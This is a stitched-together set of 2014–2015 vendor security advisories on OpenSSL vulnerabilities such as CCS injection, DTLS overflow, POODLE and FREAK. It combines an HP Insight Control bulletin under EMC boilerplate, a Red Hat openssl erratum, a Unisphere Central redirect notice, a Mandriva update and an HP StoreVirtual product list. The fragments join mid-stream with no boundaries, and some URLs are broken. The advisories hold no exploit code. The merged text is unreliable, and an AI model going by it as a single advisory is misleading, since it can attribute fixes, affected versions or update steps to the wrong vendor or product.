For an explanation of Severity Ratings, refer to EMC Knowledgebase solution emc218831. EMC recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability.
EMC Corporation distributes EMC Security Advisories, in order to bring to the attention of users of the affected EMC products, important security information. EMC recommends that all users determine the applicability of this information to their individual situations and take appropriate action. EMC disclaims all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages, so the foregoing limitation may not apply.
Release Date: 2014-08-08 Last Updated: 2014-08-08
Potential Security Impact: Remote denial of service (DoS), code execution, unauthorized access, disclosure of information
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP System Management Homepage (SMH), HP Smart Update Manager (SUM), and HP Version Control Agent (VCA) running on Linux and Windows. These components of HP Insight Control server deployment could be exploited remotely resulting in denial of service (DoS), code execution, unauthorized access, or disclosure of information.
HP Insight Control server deployment packages HP System Management Homepage (SMH) and HP Version Control Agent (VCA), and HP Smart Update Manager (SUM) and deploys them through the following components. This bulletin provides the information needed to update the HP Insight Control server deployment solution.
Install HP Management Agents for Windows x86/x64 Install HP Management Agents for RHEL 5 x64 Install HP Management Agents for RHEL 6 x64 Install HP Management Agents for SLES 10 x64 Install HP Management Agents for SLES 11 x64 Upgrade Proliant Firmware
References:
CVE-2010-5298 Remote Denial of Service CVE-2014-0076 Unauthorized Disclosure of Information CVE-2014-0195 Remote Unauthorized Access CVE-2014-0198 Remote Denial of Service CVE-2014-0221 Remote Denial of Service (DoS) CVE-2014-0224 Remote Unauthorized Access or Disclosure of Information CVE-2014-3470 Remote Code Execution or Unauthorized Access SSRT101628
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Insight Control server deployment v7.1.2, v7.2.0, v7.2.1, v7.2.2, v7.3.1
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2010-5298 (AV:N/AC:H/Au:N/C:N/I:P/A:P) 4.0 CVE-2014-0076 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2014-0195 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-0198 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0221 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0224 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-3470 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following updates to v7.3.1 of HP Insight Control server deployment to resolve this vulnerability. HP has provided manual update steps if a version upgrade is not possible; if users wish to remain at v7.1.2, v7.2.0, or v7.2.1.
Note: It is important to check your current running version of HP Insight Control server deployment and to follow the correct steps listed below. For HP Insight Control server deployment v7.2.2, users must upgrade to v7.3.1 and follow the steps below to remove the vulnerability. The vulnerability known as Heartbleed (CVE-2014-0160) was fixed in HP Insight Control server deployment v7.3.1. That Security Bulletin with instructions on how to upgrade to v7.3.1 can be found here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n a-c04267749
HP Insight Control server deployment users of v7.1.2, v7.2.0, v7.2.1 should take the following steps to remove this vulnerability.
Delete the files smhamd64-.exe/smhx86-.exe" from Component Copy Location listed in the following table, rows 1 and 2. Delete the files "vcax86-.exe/vcaamd64-.exe from Component Copy Location listed in the following table, rows 3 and 4. Delete the files hpsmh-7.*.rpm" from Component Copy Location listed in row 5. In sequence, perform the steps from left to right in the following table. First, download components from Download Link; Second, rename the component as suggested in Rename to. Third, copy the component to the location specified in Component Copy Location. Table Row Number Download Link Rename to Component Copy Location
1 http://www.hp.com/swpublishing/MTX-e8076c2a35804685ad65b2b1ba smhamd64-ccp023716.exe \express\hpfeatures\hpagents-ws\components\Win2008
2 http://www.hp.com/swpublishing/MTX-3395d737d98f42149125b9bb05 smhx86-cp023715.exe \express\hpfeatures\hpagents-ws\components\Win2008
3 http://www.hp.com/swpublishing/MTX-8aefeaf490284a7691eca97d13 vcax86-cp023742.exe \express\hpfeatures\hpagents-ws\components\Win2008
4 http://www.hp.com/swpublishing/MTX-c0d32bac154a4d93839d8cd1f2 vcaamd64-cp023743.exe \express\hpfeatures\hpagents-ws\components\Win2008
5 http://www.hp.com/swpublishing/MTX-bd9a1cf60e344c549c4888db93 Do not rename the downloaded component for this step. \express\hpfeatures\hpagents-sles11-x64\components \express\hpfeatures\hpagents-sles10-x64\components \express\hpfeatures\hpagents-rhel5-x64\components \express\hpfeatures\hpagents-rhel6-x64\components
Download and extract the HPSUM 5.3.6 component from ftp://ftp.hp.com/pub/softlib2/software1/pubsw-windows/p750586112/v99793
Copy all content from extracted ZIP folder and paste into \eXpress\hpfeatures\fw-proLiant\components Initiate Install HP Management Agents for SLES 11 x64 on targets running SLES11 x64. Initiate Install HP Management Agents for SLES 10 x64 on targets running SLES10 x64. Initiate Install HP Management Agents for RHEL 6 x64 on targets running RHEL 6 x64. Initiate Install HP Management Agents for RHEL 5 x64 on targets running RHEL 5 x64. Initiate Install HP Management Agents for Windows x86/x64 on targets running Windows.
HP Insight Control server deployment users with v7.2.2:
Please upgrade to Insight Control server deployment v7.3.1 and follow the steps below for v7.3.1.
HP Insight Control server deployment users with v7.3.1:
Perform steps 1 - 4 as outlined above for users with HP Insight Control server deployment v7.1.2, v7.2.0, and v7.2.1. Download the HP SUM ZIP file from http://www.hp.com/swpublishing/MTX-f6c141a7feeb4a358bbb28300f
Extract the contents from the HP SUM ZIP file to \eXpress\hpfeatures\fw-proLiant\components location on the Insight Control server deployment server
Related security bulletins:
For System Management Homepage please see Security bulletin HPSBMU03051 https ://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04 345210
For HP Version Control Agent please see Security bulletin HPSBMU03057 https:/ /h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c0434 9897
HISTORY Version:1 (rev.1) - 8 August 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: openssl security update Advisory ID: RHSA-2014:0625-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0625.html Issue date: 2014-06-05 CVE Names: CVE-2010-5298 CVE-2014-0195 CVE-2014-0198 CVE-2014-0221 CVE-2014-0224 CVE-2014-3470 =====================================================================
- Summary:
Updated openssl packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.
The Red Hat Security Response Team has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
- Description:
OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1) protocols, as well as a full-strength, general purpose cryptography library.
It was found that OpenSSL clients and servers could be forced, via a specially crafted handshake packet, to use weak keying material for communication. A man-in-the-middle attacker could use this flaw to decrypt and modify traffic between a client and a server. (CVE-2014-0224)
Note: In order to exploit this flaw, both the server and the client must be using a vulnerable version of OpenSSL; the server must be using OpenSSL version 1.0.1 and above, and the client must be using any version of OpenSSL. For more information about this flaw, refer to: https://access.redhat.com/site/articles/904433
A buffer overflow flaw was found in the way OpenSSL handled invalid DTLS packet fragments. A remote attacker could possibly use this flaw to execute arbitrary code on a DTLS client or server. (CVE-2014-0195)
Multiple flaws were found in the way OpenSSL handled read and write buffers when the SSL_MODE_RELEASE_BUFFERS mode was enabled. A TLS/SSL client or server using OpenSSL could crash or unexpectedly drop connections when processing certain SSL traffic. (CVE-2010-5298, CVE-2014-0198)
A denial of service flaw was found in the way OpenSSL handled certain DTLS ServerHello requests. A specially crafted DTLS handshake packet could cause a DTLS client using OpenSSL to crash. (CVE-2014-0221)
A NULL pointer dereference flaw was found in the way OpenSSL performed anonymous Elliptic Curve Diffie Hellman (ECDH) key exchange. A specially crafted handshake packet could cause a TLS/SSL client that has the anonymous ECDH cipher suite enabled to crash. (CVE-2014-3470)
Red Hat would like to thank the OpenSSL project for reporting these issues. Upstream acknowledges KIKUCHI Masashi of Lepidum as the original reporter of CVE-2014-0224, Jüri Aedla as the original reporter of CVE-2014-0195, Imre Rad of Search-Lab as the original reporter of CVE-2014-0221, and Felix Gröbert and Ivan Fratrić of Google as the original reporters of CVE-2014-3470.
All OpenSSL users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. For the update to take effect, all services linked to the OpenSSL library (such as httpd and other SSL-enabled services) must be restarted or the system rebooted.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1087195 - CVE-2010-5298 openssl: freelist misuse causing a possible use-after-free 1093837 - CVE-2014-0198 openssl: SSL_MODE_RELEASE_BUFFERS NULL pointer dereference in do_ssl3_write() 1103586 - CVE-2014-0224 openssl: SSL/TLS MITM vulnerability 1103593 - CVE-2014-0221 openssl: DoS when sending invalid DTLS handshake 1103598 - CVE-2014-0195 openssl: Buffer overflow via DTLS invalid fragment 1103600 - CVE-2014-3470 openssl: client-side denial of service when using anonymous ECDH
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl-1.0.1e-16.el6_5.14.src.rpm
i386: openssl-1.0.1e-16.el6_5.14.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm
x86_64: openssl-1.0.1e-16.el6_5.14.i686.rpm openssl-1.0.1e-16.el6_5.14.x86_64.rpm openssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.14.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source: openssl-1.0.1e-16.el6_5.14.src.rpm
i386: openssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm openssl-devel-1.0.1e-16.el6_5.14.i686.rpm openssl-perl-1.0.1e-16.el6_5.14.i686.rpm openssl-static-1.0.1e-16.el6_5.14.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.14.x86_64.rpm openssl-devel-1.0.1e-16.el6_5.14.i686.rpm openssl-devel-1.0.1e-16.el6_5.14.x86_64.rpm openssl-perl-1.0.1e-16.el6_5.14.x86_64.rpm openssl-static-1.0.1e-16.el6_5.14.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl-1.0.1e-16.el6_5.14.src.rpm
x86_64: openssl-1.0.1e-16.el6_5.14.i686.rpm openssl-1.0.1e-16.el6_5.14.x86_64.rpm openssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.14.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source: openssl-1.0.1e-16.el6_5.14.src.rpm
x86_64: openssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.14.x86_64.rpm openssl-devel-1.0.1e-16.el6_5.14.i686.rpm openssl-devel-1.0.1e-16.el6_5.14.x86_64.rpm openssl-perl-1.0.1e-16.el6_5.14.x86_64.rpm openssl-static-1.0.1e-16.el6_5.14.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl-1.0.1e-16.el6_5.14.src.rpm
i386: openssl-1.0.1e-16.el6_5.14.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm openssl-devel-1.0.1e-16.el6_5.14.i686.rpm
ppc64: openssl-1.0.1e-16.el6_5.14.ppc.rpm openssl-1.0.1e-16.el6_5.14.ppc64.rpm openssl-debuginfo-1.0.1e-16.el6_5.14.ppc.rpm openssl-debuginfo-1.0.1e-16.el6_5.14.ppc64.rpm openssl-devel-1.0.1e-16.el6_5.14.ppc.rpm openssl-devel-1.0.1e-16.el6_5.14.ppc64.rpm
s390x: openssl-1.0.1e-16.el6_5.14.s390.rpm openssl-1.0.1e-16.el6_5.14.s390x.rpm openssl-debuginfo-1.0.1e-16.el6_5.14.s390.rpm openssl-debuginfo-1.0.1e-16.el6_5.14.s390x.rpm openssl-devel-1.0.1e-16.el6_5.14.s390.rpm openssl-devel-1.0.1e-16.el6_5.14.s390x.rpm
x86_64: openssl-1.0.1e-16.el6_5.14.i686.rpm openssl-1.0.1e-16.el6_5.14.x86_64.rpm openssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.14.x86_64.rpm openssl-devel-1.0.1e-16.el6_5.14.i686.rpm openssl-devel-1.0.1e-16.el6_5.14.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source: openssl-1.0.1e-16.el6_5.14.src.rpm
i386: openssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm openssl-perl-1.0.1e-16.el6_5.14.i686.rpm openssl-static-1.0.1e-16.el6_5.14.i686.rpm
ppc64: openssl-debuginfo-1.0.1e-16.el6_5.14.ppc64.rpm openssl-perl-1.0.1e-16.el6_5.14.ppc64.rpm openssl-static-1.0.1e-16.el6_5.14.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-16.el6_5.14.s390x.rpm openssl-perl-1.0.1e-16.el6_5.14.s390x.rpm openssl-static-1.0.1e-16.el6_5.14.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-16.el6_5.14.x86_64.rpm openssl-perl-1.0.1e-16.el6_5.14.x86_64.rpm openssl-static-1.0.1e-16.el6_5.14.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl-1.0.1e-16.el6_5.14.src.rpm
i386: openssl-1.0.1e-16.el6_5.14.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm openssl-devel-1.0.1e-16.el6_5.14.i686.rpm
x86_64: openssl-1.0.1e-16.el6_5.14.i686.rpm openssl-1.0.1e-16.el6_5.14.x86_64.rpm openssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm openssl-debuginfo-1.0.1e-16.el6_5.14.x86_64.rpm openssl-devel-1.0.1e-16.el6_5.14.i686.rpm openssl-devel-1.0.1e-16.el6_5.14.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
Source: openssl-1.0.1e-16.el6_5.14.src.rpm
i386: openssl-debuginfo-1.0.1e-16.el6_5.14.i686.rpm openssl-perl-1.0.1e-16.el6_5.14.i686.rpm openssl-static-1.0.1e-16.el6_5.14.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-16.el6_5.14.x86_64.rpm openssl-perl-1.0.1e-16.el6_5.14.x86_64.rpm openssl-static-1.0.1e-16.el6_5.14.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package
- References:
https://www.redhat.com/security/data/cve/CVE-2010-5298.html https://www.redhat.com/security/data/cve/CVE-2014-0195.html https://www.redhat.com/security/data/cve/CVE-2014-0198.html https://www.redhat.com/security/data/cve/CVE-2014-0221.html https://www.redhat.com/security/data/cve/CVE-2014-0224.html https://www.redhat.com/security/data/cve/CVE-2014-3470.html https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/site/articles/904433 https://access.redhat.com/site/solutions/905793
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux)
iD8DBQFTkGAKXlSAg2UNWIIRAnrwAJ9sLrj3wCAZhJU00jxgt03unDAHywCfVjUB pJJhdOUzRUL8R2haDM4xrsk= =hZF8 -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce. Unvalidated Redirect Vulnerability (CVE-2015-0512)
A potential vulnerability in Unisphere Central may allow remote attackers to redirect users to arbitrary web sites and conduct phishing attacks. The attacker can specify the location of the arbitrary site in the unvalidated parameter of a crafted URL. If this URL is accessed, the browser is redirected to the arbitrary site specified in the parameter.
CVSSv2 Base Score: 5.8 (AV:N/AC:M/Au:N/C:P/I:P/A:N)
- To search for a particular CVE, use the NVD database\x92s search utility at http://web.nvd.nist.gov/view/vuln/search
Resolution: The following Unisphere Central release contains resolutions to the above issues: \x95 Unisphere Central version 4.0.
The Montgomery ladder implementation in OpenSSL through 1.0.0l does not ensure that certain swap operations have a constant-time behavior, which makes it easier for local users to obtain ECDSA nonces via a FLUSH+RELOAD cache side-channel attack (CVE-2014-0076).
The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug (CVE-2014-0160).
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the CCS Injection vulnerability (CVE-2014-0224).
The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other products, uses nondeterministic CBC padding, which makes it easier for man-in-the-middle attackers to obtain cleartext data via a padding-oracle attack, aka the POODLE issue (CVE-2014-3566).
The BN_sqr implementation in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not properly calculate the square of a BIGNUM value, which might make it easier for remote attackers to defeat cryptographic protection mechanisms via unspecified vectors, related to crypto/bn/asm/mips.pl, crypto/bn/asm/x86_64-gcc.c, and crypto/bn/bn_asm.c (CVE-2014-3570).
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct ECDHE-to-ECDH downgrade attacks and trigger a loss of forward secrecy by omitting the ServerKeyExchange message (CVE-2014-3572).
OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k does not enforce certain constraints on certificate data, which allows remote attackers to defeat a fingerprint-based certificate-blacklist protection mechanism by including crafted data within a certificate's unsigned portion, related to crypto/asn1/a_verify.c, crypto/dsa/dsa_asn1.c, crypto/ecdsa/ecs_vrf.c, and crypto/x509/x_all.c (CVE-2014-8275).
The ssl3_get_key_exchange function in s3_clnt.c in OpenSSL before 0.9.8zd, 1.0.0 before 1.0.0p, and 1.0.1 before 1.0.1k allows remote SSL servers to conduct RSA-to-EXPORT_RSA downgrade attacks and facilitate brute-force decryption by offering a weak ephemeral RSA key in a noncompliant role, related to the FREAK issue. NOTE: the scope of this CVE is only client code based on OpenSSL, not EXPORT_RSA issues associated with servers or other TLS implementations (CVE-2015-0204).
The ssl3_get_cert_verify function in s3_srvr.c in OpenSSL 1.0.0 before 1.0.0p and 1.0.1 before 1.0.1k accepts client authentication with a Diffie-Hellman (DH) certificate without requiring a CertificateVerify message, which allows remote attackers to obtain access without knowledge of a private key via crafted TLS Handshake Protocol traffic to a server that recognizes a Certification Authority with DH support (CVE-2015-0205).
The updated packages have been upgraded to the 1.0.1m version where these security flaws has been fixed.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-5298 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0076 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0198 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3513 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3567 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3569 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3570 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3571 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8275 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0204 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0205 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0206 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0209 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0287 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0288 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0289 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0293 http://openssl.org/news/secadv_20150108.txt http://openssl.org/news/secadv_20150319.txt
Updated Packages:
Mandriva Business Server 2/X86_64: 324a85f7e1165ab02881e44dbddaf599 mbs2/x86_64/lib64openssl1.0.0-1.0.1m-1.mbs2.x86_64.rpm 9c0bfb6ebd43cb6d81872abf71b4f85f mbs2/x86_64/lib64openssl-devel-1.0.1m-1.mbs2.x86_64.rpm 58df54e72ca7270210c7d8dd23df402b mbs2/x86_64/lib64openssl-engines1.0.0-1.0.1m-1.mbs2.x86_64.rpm b5313ffb5baaa65aea05eb05486d309a mbs2/x86_64/lib64openssl-static-devel-1.0.1m-1.mbs2.x86_64.rpm a9890ce4c33630cb9e00f3b2910dd784 mbs2/x86_64/openssl-1.0.1m-1.mbs2.x86_64.rpm 521297a5fe26e2de0c1222d8d03382d1 mbs2/SRPMS/openssl-1.0.1m-1.mbs2.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFVFTm1mqjQ0CJFipgRAoYFAKCaubn00colzVNnUBFjSElyDptGMQCfaGoS kz0ex6eI6hA6qSwklA2NoXY= =GYjX -----END PGP SIGNATURE----- . These vulnerabilities include:
-
The SSLv3 vulnerability known as "Padding Oracle on Downgraded Legacy Encryption" also known as "POODLE", which could be exploited remotely resulting in disclosure of information.
-
HP StoreVirtual VSA Software 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4130 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4130 600GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 FC 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 2TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 3TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 450GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4630 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4730 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 3TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4335 China Hybrid Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4335 Hybrid Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 4TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4130 600GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4130 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 1TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 900GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 FC 900GB China SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4330 FC 900GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4335 China Hybrid SAN Solution 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4335 China Hybrid Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4335 Hybrid SAN Solution 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4335 Hybrid Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 2TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 3TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 3TB MDL SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 450GB SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 450GB SAS Storage/S-Buy 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 4TB MDL SAS Storage 12.6, 12.5, 12.0, 11.5
- HP StoreVirtual 4530 600GB SAS Storage 12.6, 12.5, 12.0, 11.5
